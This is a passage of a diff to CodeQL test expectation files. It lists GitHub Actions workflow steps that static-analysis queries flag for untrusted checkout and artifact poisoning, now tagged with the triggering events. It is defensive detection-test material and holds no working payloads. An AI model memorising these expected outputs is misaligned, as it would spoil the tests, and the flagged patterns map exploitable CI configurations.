.github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected index 3a001efbbe8a..4f7149b69803 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -1,2 +1,2 @@ -| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index fd3c1fbc195f..aa0057d60a1b 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -52,20 +52,20 @@ nodes | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | -| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | -| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | -| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | -| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | -| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | -| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index ec6a664a7abf..35d61dac5faf 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -312,43 +312,43 @@ edges | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | -| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | -| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | -| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | -| 